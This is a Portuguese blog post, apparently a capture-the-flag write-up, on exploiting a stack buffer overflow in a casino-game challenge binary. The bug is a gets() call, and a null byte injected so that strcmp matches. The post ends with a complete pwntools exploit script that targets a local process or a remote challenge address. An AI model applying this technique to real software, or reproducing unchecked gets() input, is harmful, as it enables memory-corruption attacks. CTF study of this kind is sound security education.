Data da postagem: Apr 27, 2022
Tempo de leitura: 5 minutos

Existe um óbvio buffer overflow que permite sobreescrever valores. Mas ao invés de uma simples execução de shellcode ou redirecionamento de código, havia um caminho mais simples de se percorrer.

Caso queira acompanhar, o binário do challenge está aqui. E o link com as informações do evento aqui.

O programa tem uma simples funcionalidade: pede uma string de 4 caracteres e a compara com uma outra string gerada aleatoriamente. Caso se consiga acertar a string aleatória, ganha-se 10 moedas, caso n, perde-se 10 moedas. No ínicio da execução é avisado de que existe um belo prêmio quando acumularmos 1000 moedas. A primeira coisa que chama a atenção é que, quando inserimos mais de 8 caracteres, é possível sobreescrever o valor da Correct Word:

Welcome to the casino! A great prize awaits you when you hit 1000 coins ;)
Your current balance: 100
Guess me a string of length 4 with lowercase letters: aaaa
Your guess: aaaa
Correct word: pmbp
Bummer, you lost. -10 coins.
Your current balance: 90
Guess me a string of length 4 with lowercase letters: AAAAAAAABBBBBBBB
Your guess: AAAAAAAABBBBBBBB
Correct word: BBBBBBBB
Bummer, you lost. -10 coins.
Your current balance: 80
Guess me a string of length 4 with lowercase letters: 

Essa tese é confirmada ao se analisar o pseudo código gerado pelo Ghidra da função casino, responsável por maior parte da lógica do programa. Renomeei as variáveis que achei interessantes e deixei o resto do jeito que o Ghidra quis:

Pode se observar na linha 23 que o programa utiliza a função gets para obter o input do usuário, como gets não se importa com o tamanho do input, possibilita que seja armazenado em user_input um valor maior que os 8 chars previamente reservados, nos deixando sobreescrever os valores armazenados abaixo de user_input na stack. E logo abaixo de user_input na stack está, convenientemente, correct_guess com o valor pseudoaleatório gerado no looping iniciado na linha 36.

Há um pequeno pulo do gato para ser bem sucedido ao explorar esse overflow. De que adianta poder trocar o valor de correct_guess se na hora da comparação os valores vão ser diferentes? Afinal, é necesário inserir um certo número de caracteres antes de se chegar na área de memória onde está correct_guess e na hora da comparação os dois valores não vão bater:

Guess me a string of length 4 with lowercase letters: AAAAAAAABBBBBBBB
Your guess: AAAAAAAABBBBBBBB
Correct word: BBBBBBBB
Bummer, you lost. -10 coins.

Todas as proteções populares estão habilitadas no binário (NX, PIE, Canaries), o que dificulta alguns tipos de ataque. Na linha 60 existe uma verificação que checka se o valor de balance é maior que 1000. Caso seja, chama uma função que imprime a flag na tela. Esse é o grande prêmio anunciado no ínicio do programa. Já que controlamos o valor de correct_guess, qual seria a melhor forma de explorar esse comportamento?

Aqui mora o momento que o gato dá seu pequeno pulo: na linha 47 é chamada a função strcmp para comparar user_input e correct_guess. strcmp foi feita para comparar duas strings e considera uma string uma sequência de caracteres finalizada por um NULL byte. Consegue entender onde quero chegar?

gets, diferente de strcmp, não se importa em consumir NULL bytes, ela vai lendo até encontrar um EOF (end of file, pode ser enviado com CTRL+D no terminal) ou um new line (um simples Enter). Então é possível inserir via gets uma string que é formada por: 7 caracteres + NULL byte + 7 caracteres. Os primeiros 7 caracteres serão utilizados em strcmp como nosso input (ela vai desconsiderar o NULL byte e tudo que vier depois), e o segundo conjunto será o novo valor de correct_guess.

No meu exploit criei a string venenosa overflow = (b’A’ * 7) + b’\x00’ + (b’A’ * 7) e criei um loop com while que pega o output do programa, verifica se esse output tem o valor “FLAG e, caso não tenha, continua enviando a string venenosa. Isso é necessário porque a cada interação que enviamos a string ganhamos 10 moedas e a flag só será impressa na tela quando obtivermos 1000 moedas. Se deseja assistir a todos os momentos que essas moedas são ganhas basta descomentar a linha #print(output) dentro do loop.

#!/usr/bin/env python

from pwn import *

get_flag = False
chall_name = 'gambler_overflow'

def run_with_gdb(p):
    gdb.attach(p,'''
    b *main
    b *casino+280''')

def run_exploit(p, debug):
    if debug:
        run_with_gdb(p)
        

    overflow = (b'A' * 7) + b'\x00' + (b'A' * 7)

    while (True):
        output = p.recv(timeout=2).decode()
        #print(output)
        if "FLAG" in output:
            print(output)
        else:
            p.sendline(overflow)
            
    p.close()

if get_flag:
    p = remote('178.62.32.210', '30138')
    run_exploit(p, False)
else:
    process_full_path = './' + chall_name
    p = process(process_full_path)
    run_exploit(p, False)

ao rodar, rapidamente chegamos ao resultado que nessa visualização imprimiu meu arquivo flag.txt local criado para fins de teste:

[+] Starting local process './gambler_overflow': pid 7322
Your guess: AAAAAAA
Correct word: AAAAAAA
You won (wow)! +10 coins.
FLAG{isso_eh_a_flag_txt}

See you next time!

tags: Sem Categoria, stack overflow, exploits,